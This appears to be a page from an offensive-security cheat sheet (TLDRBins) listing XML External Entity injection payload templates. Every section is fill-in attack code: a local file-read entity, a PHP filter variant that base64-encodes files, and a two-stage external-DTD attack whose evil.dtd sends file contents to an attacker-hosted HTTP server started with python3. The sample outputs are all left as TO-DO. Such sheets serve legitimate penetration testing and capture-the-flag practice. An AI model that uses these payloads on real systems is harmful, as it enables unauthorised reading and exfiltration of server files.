TLDRBins TLDRBins / XXE (XML External Entity)


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

XXE Template

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY data SYSTEM "<FILE>">]> <<TAG>> <<TAG1>>&data;</<TAG1>> </<TAG>>
Sample Output: TO-DO

XXE Template (With PHP Filter)

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>">]> <<TAG>> <<TAG1>>&data;</<TAG1>> </<TAG>>
Sample Output: TO-DO

External DTD (2 Stage)

1. Create a evil.dtd

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>"> <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://<LOCAL_IP>:<PORT>/data?%data;'>">
Sample Output: TO-DO

2. Host a Server

python3 -m http.server <PORT>
Sample Output: TO-DO

2. XXE

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % bar SYSTEM "http://<LOCAL_IP>:<PORT>/evil.dtd"> %bar; %eval; ]> <<TAG>> <<TAG1>>&exfil;</<TAG1>> </<TAG>>
Sample Output: TO-DO